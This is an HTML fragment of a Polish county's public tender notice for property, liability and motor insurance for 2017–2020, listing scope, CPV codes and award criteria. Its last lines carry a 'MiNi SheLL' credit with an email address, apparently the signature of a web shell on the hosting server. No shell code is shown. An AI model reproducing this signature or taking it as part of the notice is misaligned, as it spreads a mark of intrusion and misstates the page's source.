                <b>Nazwa: </b>Ubezpieczenie mienia i odpowiedzialności Powiatu Ostródzkiego                     oraz jednostek organizacyjnych Powiatu Ostródzkiego, w zakresie ubezpieczeń majątkowych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 1  Ubezpieczenie mienia i odpowiedzialności Powiatu Ostródzkiego                     oraz jednostek organizacyjnych Powiatu Ostródzkiego, w zakresie ubezpieczeń majątkowych, jn.:
a)	Ubezpieczenia mienia od ognia i innych zdarzeń losowych,
b)	Ubezpieczenie mienia od kradzieży z włamaniem i rabunku oraz od kradzieży zwykłej,
c)	Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk,
d)	Ubezpieczenie odpowiedzialności cywilnej,
e)	Ubezpieczenie szyb od stłuczenia,
f)	Ubezpieczenie następstw nieszczęśliwych wypadków,
g)	Ubezpieczenie maszyn od uszkodzeń od wszystkich ryzyk.
Polisy ubezpieczeniowe w ubezpieczeniach majątkowych będą wystawiane indywidualnie dla każdej jednostki na okresy:
od 02.03.2017r. do 01.03.2018r. 
od 02.03.2018r. do 01.03.2019r. 
od 02.03.2019r. do 01.03.2020r. 

Dla ubezpieczeń wspólnych, tj. ubezpieczenie mienia od ognia i innych zdarzeń losowych                          i ubezpieczenie sprzętu elektronicznego w systemie na pierwsze ryzyko, ubezpieczenie mienia                od kradzieży z włamaniem oraz od kradzieży zwyklej, ubezpieczenie szyb od stłuczenia, ubezpieczenie odpowiedzialności cywilnej zostanie wystawiona jedna polisa (dopuszcza się wystawienie polis odrębnie na poszczególne ryzyka) obejmująca ochroną wszystkie jednostki organizacyjne Zamawiającego na okresy:
od 02.03.2017r. do 01.03.2018r. 
od 02.03.2018r. do 01.03.2019r. 
od 02.03.2019r. do 01.03.2020r. 
Każdej jednostce, o której mowa w § 3 ust. 2 siwz, zostanie wystawiony certyfikat potwierdzający udzielenie ochrony ubezpieczeniowej w zakresie wynikającym z polisy wspólnej.

UWAGA: Zamawiający zastrzega sobie prawo zmiany sposobu wystawienia polis ubezpieczeniowych po rozstrzygnięciu przetargu: dla ubezpieczeń majątkowych (indywidualnych i wspólnych) może zostać wystawiona jedna polisa obejmująca ochroną wszystkie jednostki wskazane w SIWZ.  
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>66510000-8, 66512100-3,
                    66515000-3,
                    66516000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 36<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Zaakceptowanie klauzul dodatkowych </td><td>30</td></tr><tr><td>Zaakceptowanie dodatkowych limitów odpowiedzialności </td><td>8</td></tr><tr><td>Wskazanie osób odpowiedzialnych za obsługę </td><td>2</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Ubezpieczenie mienia i odpowiedzialności Powiatu Ostródzkiego                     oraz jednostek organizacyjnych Powiatu Ostródzkiego w zakresie ubezpieczeń komunikacyjnych <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część II -  Ubezpieczenie mienia i odpowiedzialności Powiatu Ostródzkiego                     oraz jednostek organizacyjnych Powiatu Ostródzkiego w zakresie ubezpieczeń komunikacyjnych jn.: 
a)	Ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych
b)	Ubezpieczenie autocasco,
c)	Ubezpieczenie następstw nieszczęśliwych wypadków (NNW) kierowcy i pasażerów,
d)	Ubezpieczenie assistance.
Polisy dla ubezpieczeń komunikacyjnych będą wystawione na trzy okresy roczne określone indywidualnie dla każdego pojazdu i wskazane w załącznikach zawierających wykazy pojazdów. Ubezpieczenia pojazdów nabywanych w trakcie trwania umowy o udzielenie zamówienia będą zawierane na okresy roczne zgodnie z  wnioskiem Zamawiającego. 
Ostatnim dniem umożliwiającym ubezpieczenie pojazdu na warunkach umowy o udzielenie zamówienia publicznego jest ostatni dzień obowiązywania umowy, to jest 01.03.2020r.
Maksymalnie okres ubezpieczenia pojazdów zakończy się dnia  28.02.2021r.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>66510000-8, 66512100-3,
                    66514110-0,
                    66516100-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 36<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Zaakceptowanie klauzul dodatkowych </td><td>35</td></tr><tr><td>Wskazanie osób odpowiedzialnych za obsługę </td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com